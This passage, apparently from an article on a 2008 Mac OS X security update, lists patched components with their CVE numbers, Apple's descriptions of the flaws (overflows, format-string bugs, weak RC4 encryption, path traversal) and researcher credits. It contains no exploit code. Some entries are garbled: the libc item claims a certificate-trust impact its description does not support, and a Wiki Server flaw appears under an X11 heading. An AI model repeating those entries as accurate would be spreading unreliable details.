This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses the vulnerability in CVE-2008-0987. Apple says "a stack based buffer overflow exists in the handling of Adobe Digital Negative (DNG) image files. By enticing a user to open a maliciously crafted image file, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved validation of DNG image files. This issue does not affect systems prior to Mac OS X v10.5." Apple credits Clint Ruoho of Laconic Security for reporting this vulnerability.

Kerberos
This patch affects users of Mac OS X v10.4.11, Mac OS X v10.5.2. The update addresses the vulnerabilities in CVE-2007-5901, CVE-2007-5971, CVE-2008-0062, and CVE-2008-0063. Apple says " Multiple memory corruption issues exist in MIT Kerberos 5, which may lead to an unexpected application termination or arbitrary code execution with system privileges. CVE-2008-0063 do not affect systems running Mac OS X v10.5 or later. CVE-2007-5901 does not affect systems prior to Mac OS X v10.4."

libc
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11. The update addresses a vulnerability in CVE-2008-0988. A remote attacker may be able to cause a certificate to appear trusted. According to Apple "An off by one issue exists in Libsystem's strnstr(3) implementation. Applications that use the strnstr API can read one byte beyond the limit specified by the user, which may lead to an unexpected application termination. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later." Apple credits Mike Ash of Rogue Amoeba Software for reporting this vulnerability.

mDNSResponder
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0989. Apple says "a format string issue exists in mDNSResponderHelper. By setting the local hostname to a maliciously crafted string, a local user could cause a denial of service or arbitrary code execution with the privileges of mDNSResponderHelper. This update addresses the issue by using a static format string. This issue does not affect systems prior to Mac OS X v10.5."

notifyd
This patch only affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11 and addresses a vulnerability in CVE-2008-0990. Apple says " notifyd accepts Mach port death notifications without verifying that they come from the kernel. If a local user sends fake Mach port death notifications to notifyd, applications that use the notify(3) API to register for notifications may never receive the notifications. This update addresses the issue by only accepting Mach port death notifications from the kernel. This issue does not affect systems running Mac OS X v10.5 or later."

OpenSSH
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, and Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2007-4752. Apple says "OpenSSH forwards a trusted X11 cookie when it cannot create an untrusted one. This may allow a remote attacker to gain elevated privileges. This update addresses the issue by updating OpenSSH to version 4.7."

pax archive utility
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0992. Apple says "the pax command line tool does not check a length in its input before using it as an array index, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by checking the index. This issue does not affect systems prior to Mac OS X v10.5."

PHP
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a vulnerabilities in CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768, CVE-2007-4887. Apple says " PHP is updated to version 5.2.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution."

PHP
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2. The addresses a vulnerability in CVE-2007-3378 and CVE-2007-3799. Apple says "PHP is updated to version 4.4.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution."

Podcast Producer
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses the vulnerability in CVE-2008-0993. Apple says "the Podcast Capture application provides passwords to a subtask through the arguments, potentially exposing the passwords to other local users. This update corrects the issue by providing passwords to the subtask through a pipe. This issue does not affect systems prior to Mac OS X v10.5." Apple credits Maximilian Reiss of Chair for Applied Software Engineering, TUM for reporting this issue.

Preview
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2 and addresses the vulnerability in CVE-2008-0994. Apple says "when Preview saves a PDF file with encryption, it uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4."

Printing
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0995. Apple says " Printing to a PDF file and setting an 'open' password uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4. This issue does not affect systems prior to Mac OS X v10.5."

Printing
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses a vulnerability in CVE-2008-0996. Apple says " An information disclosure issue exists in the handling of authenticated print queues. When starting a job on an authenticated print queue, the credentials used for authentication may be saved to disk. This update addresses the issue by removing user credentials from printing presets before saving them to disk. This issue does not affect systems prior to Mac OS X v10.5."

System Configuration
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2. The update addresses the vulnerability in CVE-2008-0998. Apple says " The privileged tool NetCfgTool uses distributed objects to communicate with untrusted client programs on the local machine. By sending a maliciously crafted message, a local user can bypass the authorization step and may cause arbitrary code execution with the privileges of the privileged program.

UDF
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2. The update addresses the vulnerability in CVE-2008-0999. Apple says " A null pointer dereference issue exists in the handling of Universal Disc Format (UDF) file systems. By enticing a user to open a maliciously crafted disk image, an attacker may cause an unexpected system shutdown. This update addresses the issue through improved validation of UDF file systems. This issue does not affect systems prior to Mac OS X v10.5." Apple credits to Paul Wagland of Redwood Software, and Wayne Linder of Iomega for reporting this vulnerability.


X11
This patch affects users of Mac OS X v10.5.2, Mac OS X Server v10.5.2 and addresses the vulnerability in CVE-2008-1000. Apple says " A path traversal issue exists in the Mac OS X v10.5 Server Wiki Server. Attackers with access to edit wiki content may upload files that leverage this issue to place content wherever the wiki server can write, which may lead to arbitrary code execution with the privileges of the wiki server. This update addresses the issue through improved file name handling. This issue does not affect systems prior to Mac OS X v10.5. Apple credits to Rodrigo Carvalho, from the Core Security Consulting Services (CSC) team of CORE Security Technologies for reporting this vulnerability.

X11
This patch affects users of Mac OS X v10.4.11 and Mac OS X Server v10.4.11 and addresses the vulnerabilities in CVE-2007-4568 and CVE-2007-4990. Apple says "multiple vulnerabilities exist in X11 X Font Server (XFS) 1.0.4, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to version 1.0.5."

X11
This patch affects users of Mac OS X v10.5.2 and Mac OS X Server v10.5.2 and addresses the vulnerability in CVE-2006-3334, CVE-2006-5793, CVE-2007-2445, CVE-2007-5266, CVE-2007-5267, CVE-2007-5268, and CVE-2007-5269. Apple says " The PNG reference library (libpng) is updated to version 1.2.24 tp address several vulnerabilities, the most serious of which may lead to a remote denial of service or arbitrary code execution.

X11
This patch affects users of Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, and Mac OS X Server v10.5.2 and addresses the vulnerability in CVE-2007-5958, CVE-2008-0006, CVE-2007-6427, CVE-2007-6428, and CVE-2007-6429. Apple says " Numerous vulnerabilities in the X11 server allow execution of arbitrary code with the privileges of the user running the X11 server if the attacker can authenticate to the X11 server. This is a security vulnerability only if the X11 server is configured to not require authentication, which Apple does not recommend."